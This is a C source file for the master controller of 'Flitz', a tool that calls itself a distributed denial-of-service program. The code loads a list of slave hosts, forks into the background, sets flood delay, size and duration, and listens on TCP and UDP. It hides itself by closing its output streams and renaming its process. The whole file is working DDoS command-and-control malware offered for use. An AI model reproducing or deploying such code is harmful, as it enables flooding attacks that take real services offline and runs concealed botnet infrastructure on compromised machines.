/*  The Flitz Master.  */



#include <stdio.h>
#include <unistd.h>
#include "Flitz.h"
#include "Flitz-master.h"
#include "net.h"
#include "slavelist.h"



int main(int argc, char *argv[]);



int main(int argc, char *argv[])
{
    int pid;

    fprintf(stderr, "\n\e[0;34m[ Flitz: Distributed Denial of Service ");
    fprintf(stderr, "(master) by: ");
    fprintf(stderr, "Xphere    --    #phreak.nl ]\e[0m\n\n\n");

    net_init();
    slavelist_file_read();

    fprintf(stderr, "Moving into background...\n");

    if ((pid = fork())) {
        exit(0);
    }
    else if (pid == 0) {
        setting.verbose = ON;
        setting.dos_delay = DEF_DOS_DELAY;
        setting.dos_size = DEF_DOS_SIZE;
        setting.dos_time = DEF_DOS_TIME;

        if (net_setuptcp() < 0 || net_setupudp() < 0) {
            fprintf(stderr, "Error: Can't get the listening sockets!\n");
            exit(-1);
        }

        close(1);
        close(2);

        if (strlen(argv[0]) >= strlen(PROC_NAME_MASTER)) {
            memset(argv[0], 0x00, strlen(argv[0]));
            strcpy(argv[0], PROC_NAME_MASTER);
        }

        while (1) {
            net_read();
            net_parse();
            net_write();
            net_time();
        }
    }
    else {
        fprintf(stderr, "Error: Couldn't fork dammit!\n");
        exit(-1);
    }
}
